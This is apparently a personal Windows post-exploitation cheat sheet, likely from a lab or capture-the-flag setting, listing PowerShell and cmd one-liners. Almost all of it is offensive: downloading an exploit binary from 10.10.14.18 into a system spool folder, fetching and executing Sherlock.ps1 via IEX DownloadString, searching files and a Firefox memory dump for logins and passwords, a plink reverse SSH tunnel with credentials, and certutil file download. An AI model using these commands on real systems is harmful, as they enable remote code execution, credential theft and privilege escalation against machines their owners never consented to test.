Windows

Searching

Get-ChildItem -Path "C:\Users\Chase\Desktop\2104firefox.dmp" -Recurse -File | Select-String login

Download

powershell.exe -exec bypass -command "Invoke-WebRequest 'http://10.10.14.18:8888/41020.exe' -OutFile 'C:\windows\system32\spool\drivers\color\41020.exe'"

Execution

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.18:8888/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"

Recursively list accessible files

gci -recurse -include *.* | select Fullname

Search file

dir abc.txt /s /p
findstr /i /s "password" *.*

REM Answer the prompt message with "y"
cmd.exe /c echo y | plink.exe -ssh -l username -pw password -R

Download a file

certutil.exe -urlcache -split -f http://ip/file file

Impacket
SecureAuth
PEASS-ng/winPEAS/winPEASexe at master · carlospolop/PEASS-ng
GitHub
Windows Privilege Escalation Guide
Last modified 11mo ago